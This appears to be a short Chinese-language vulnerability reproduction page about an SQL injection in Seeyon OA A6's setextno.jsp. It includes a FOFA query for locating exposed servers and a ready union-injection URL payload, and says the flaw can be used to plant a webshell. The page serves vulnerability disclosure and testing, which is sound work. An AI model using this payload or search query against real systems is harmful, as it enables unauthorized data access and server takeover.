致远OA A6 setextno.jsp SQL注入漏洞

漏洞描述

致远OA A6 setextno.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器

漏洞影响

致远OA A6

FOFA

title="致远A8+协同管理软件.A6"

漏洞复现

访问如下Url,其中含有 union注入

http://xxx.xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#

查看web路径

写入文件上传木马

剩下的步骤参考另一篇 致远OA A6 test.jsp SQL注入漏洞

漏洞利用POC

Note

多个目标

Goby & POC

已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中

Seeyon_OA_A6_setextno.jsp_SQL_injection

Last updated

Was this helpful?